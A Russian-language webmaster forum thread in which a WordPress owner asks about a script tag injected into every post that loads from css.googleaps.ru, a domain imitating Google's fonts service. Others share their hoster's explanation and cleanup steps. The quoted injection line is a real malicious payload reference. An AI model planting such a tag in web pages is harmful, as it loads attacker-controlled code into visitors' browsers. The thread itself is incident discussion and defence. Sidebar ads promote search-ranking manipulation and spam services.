Непонятный скрипт в каждой записи
Страницы: 1
[ Закрыто ] Непонятный скрипт в каждой записи
Подскажите что это за фигня такая, сегодня при редактировании текстов обнаружил что в КАЖДОЙ записи присутствует такой код <script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script> проверка на вирусы ничего не дала, погуглил этот скрипт, вижу у многих такая проблема возникала, но толком никто не сказал что это за скрипт и как от него избавиться. Может кто-то из форумчан знает?

Бесплатная контекстная реклама

на вордпрессе?
Цитата
Krol пишет:
на вордпрессе?
Да, на вордпресе.
Начинает проясняться ситуация, написал хостеру в ТП вот его ответ: 
Как нам удалось выяснить, данные вставки кода были добавлены посредством уязвимости самой CMS WordPress, которая была устранена в версии 4.2.4.
Также, мы проверили все имеющиеся у нас резервные копии Вашего сайта. Данные вставки уже присутствуют в самой ранней копии базе данных сайта.
Соответственно, для того, чтобы их удалить, Вам потребуется воспользоваться интерфейсом phpMyAdmin, который доступен в разделе "Базы данных" в панели управления аккаунта, выполнить поиск в базе данных по выражению из вставки кода (например,css.googleaps.ru) и далее выполнить удаление строк.
У меня 2 вп на отдельном сервере, 1 тоже заполнен скриптами, причем удаляй или чистий бестолку, вирусов тоже не нашел, а на втором такого нету, вреда или редиректов не заметил от этого скрипта в итоге забил на него, с сайтом вроде все норм. Но у меня другой скрипт появляется.
Изменено: Krol - 23 Ноября 2016 07:40
Цитата
Krol пишет:
У меня 2 вп на отдельном сервере, 1 тоже заполнен скриптами, причем удаляй или чистий бестолку, вирусов тоже не нашел, а на втором такого нету, вреда или редиректов не заметил от этого скрипта в итоге забил на него, с сайтом вроде все норм. Но у меня другой скрипт появляется.
Я тоже вреда от него не заметил, но при переписке с ТП хостера, письмо от хостера приходит с пометкой "вредоносный код", хотя я не утверждал им что этот код вредоносный, просто попросил объяснить что это за код такой. К тому же ТП хостера говорит что данный скрипт не является родным для WP, а появился благодаря уязвимости. В инете тоже большинство склоняются к его "вредоносности" хотя никто и не говорит о его явных последствиях. В общем почистил БД от этого скрипта от греха подальше))) Щас меняю везде пароли)))
Подпишусь на тему, если что отпишите тут через недельку, если не трудно, вернется или нет, тоже если что почищу.
Цитата
Krol пишет:
Подпишусь на тему, если что отпишите тут через недельку, если не трудно, вернется или нет, тоже если что почищу.
Да, посмотрим что через неделю будет, Пока что сделал следующее:1. Почистил базу данных от этого скрипта (судя по гуглу их несколько видов, в бд нашел 2 разных вида, удалил к чертям их)
2. В htaccess поставил запрет на доступ к xmlrpc.php ( на одном из сайтов посоветовали, не знаю поможет или нет)
3. Запретил в файле function такому коду появляться в записях.Посмотрим что из этого получиться. Хотелось бы услышать сталкивался ли кто то еще с такой проблемой и как ее решили.
Цитата
Александр пишет:
Цитата
Krol пишет:
Подпишусь на тему, если что отпишите тут через недельку, если не трудно, вернется или нет, тоже если что почищу.
Да, посмотрим что через неделю будет, Пока что сделал следующее:1. Почистил базу данных от этого скрипта (судя по гуглу их несколько видов, в бд нашел 2 разных вида, удалил к чертям их)
2. В htaccess поставил запрет на доступ к xmlrpc.php ( на одном из сайтов посоветовали, не знаю поможет или нет)
3. Запретил в файле function такому коду появляться в записях.Посмотрим что из этого получиться. Хотелось бы услышать сталкивался ли кто то еще с такой проблемой и как ее решили.
В ТП хостера поппросил прислать по возможности больше инфы об этом скрипте,  я думал они что-то знают, и вот что они прислали:
"С нашей стороны, мы точно также воспользовались поисковыми системами для поиска информации о том, где именно находятся вставки кода, а также каким образом можно закрыть уязвимость." )))
Цитата
Krol пишет:
У меня 2 вп на отдельном сервере, 1 тоже заполнен скриптами, причем удаляй или чистий бестолку, вирусов тоже не нашел, а на втором такого нету, вреда или редиректов не заметил от этого скрипта в итоге забил на него, с сайтом вроде все норм. Но у меня другой скрипт появляется.
Черкани мне потом, я тебе выведу эту фигню
Тупанул, не о том написал)
Изменено: j.doe - 24 Ноября 2016 00:57
Тема больше неактуальна, скрипт вычистил, тему можно закрыть.
Цитата
Александр пишет:
Тема больше неактуальна, скрипт вычистил, тему можно закрыть.

Александр, спасибо за сообщение
Тему закрыл

пожалуйста, если Ваша тема потеряла свою актуальность, отпишите об этом в теме и скиньте ссылку на тему мне в ЛС.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:42 Можно с помощью накрутки ПФ "почувствовать выход в опу мира и ощутить ответ тех поддержки яшы"? 
18:50 АП выдача 05.08.2020 | После открытия границ, кто-то куда-то? 
18:48 Накрутка поведенческих факторов весна - лето 2020 для продвижения сайта в ТОП Яндекса и Google 
18:11 Помогите с продвижением 
11:10 Lottery Partner в поиске партнеров! Самые высокие ставки! 
20:26 Падение трафика с Гугла более чем в 2 раза! А дальше - больше 
18:26 ClickDealer- свои люди на рынке буржа! 
22:08 Скупаю каналы Дзен 
21:58 Продаю Гадальные скрипты (47шт) для wordpress и dle 
21:32 Profit-smm.ru - раскрутка в Vk/Inst/Yt/Tg. Подписчики от 11.5р, лайки от 2.4р 
19:48 Качественный прогон Хрумером, Zennoposterом всего 10 WMZ, Большой опыт работы. Статьи, комментарии, профиля, гостевые. 
19:46 продам Зеброид 
17:35 SocksHub.net - proxy, которые подходят всем 
17:18 Привлеку подписчиков на Ваш канал в Яндекс Дзен, а также дочитку на статьи канала. 
18:52 ruposters.ru: На турецких курортах резко началась новая волна коронавируса 
18:07 Партнёрская рекламная сеть Vadideo Network 
16:47 [b]Webvork [/b]- международная товарная СРА сеть с сертифицированными офферами на Европу. 
11:59 Edu-affiliates - лучшая партнерка в нише эссе! 
07:46 Обсчитали в магазине 
22:08 Ваш сайт блокируют гос органы? Есть решение! 
20:41 Болезни нет, а вакцина есть